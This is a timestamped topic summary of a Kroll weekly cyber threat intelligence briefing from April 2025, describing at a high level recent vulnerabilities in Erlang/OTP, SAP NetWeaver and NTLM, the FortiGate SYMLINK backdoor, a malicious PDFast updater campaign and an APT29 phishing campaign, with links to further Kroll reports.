April 28, 2025 Cyber Threat Intelligence Briefing

kroll logo
Kroll
Apr 28, 2025
Kroll

This week’s briefing covers:

00:00 - Intro and Situational Awareness

POC Exploit Released for Erlang CVSS 10 Vulnerability
The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without prior authentication.

NTLM Hash Leaking Vulnerability Actively Exploited
Checkpoint researchers report that they have detected active exploitation of CVE-2025-24054, a hash disclosure via spoofing vulnerability that was patched as part of Microsoft’s March patching cycle.

02:37 [VULNERABILITY] Exploitation of SAP NetWeaver critical Vulnerability
SAP NetWeaver Visual Composer Metadata Uploader is not protected with a proper authorization, allowing unauthenticated agent to upload potentially malicious executable binaries that could severely harm the host system. This could significantly affect the confidentiality, integrity, and availability of the targeted system.

03:57 [CAMPAIGN] Exploitation of FortiGate Devices
Key Takeaways

  • Additional reporting on exploitation of Fortinet devices suggests that 22,000 devices are impacted by the SYMLINK backdoor globally.
  • Investigations continue into the threat group behind the backdoor.
  • Fortinet and local government authorities have proactively reached out to impacted customers.
  • Kroll has the capability to remotely detect the presence of the SYMLINK backdoor.

06:14 [CAMPAIGN] Widespread compromise through PDFast software
Key Takeaways

  • Kroll has observed a wave of malicious activity surrounding “PDFast” software
  • The updater file ran via scheduled task which downloaded and executed a binary from actor-controlled command and control (C2) domains through several PowerShell commands.
  • Kroll detections and security technologies contained and eradicated the threat before further malicious actions were taken.
  • This downloaded binary, named PDF.exe, was analyzed by Kroll and creates and executes a randomly named PyArmor packed executable.
  • It is highly recommended to remove installations of PDFast and block the domains listed in the Indicator of Compromise table below.

09:40 [CAMPAIGN] KTA014 (Aka APT29) Phishing campaign deploying new malware GRAPELOADER
Key Takeaways

  • KTA014 is involved in a new phishing campaign targeting diplomats.
  • This phishing campaign pretends to be an invitation to wine tasting events.
  • The phishing email contains a link to download a zip file which contains new malware, named GRAPELOADER.

Dive deeper:

Kroll’s Monthly Threat Intelligence Spotlight Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/cti-spotlight-trends-report

Kroll’s Q3 2024 Threat Landscape Report: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports/q3-2023-threat-landscape-report-social-engineering

Playlist of Kroll's Weekly Cyber Threat Intelligence Briefings: Cyber Threat Intelligence Briefings

Kroll Cyber Blog: https://www.kroll.com/en/insights/publications/cyber

Kroll Cyber Threat Intelligence: https://www.kroll.com/en/services/cyber-risk/managed-security/threat-intelligence-services

Kroll Threat Intelligence Reports: https://www.kroll.com/en/insights/publications/cyber/threat-intelligence-reports

Kroll Responder MDR: https://www.kroll.com/en/services/cyber-risk/managed-security/kroll-responder

#krollcyber #threatintelligence #cyberthreats

Copyright © 2026 OpsMatters™. All rights reserved.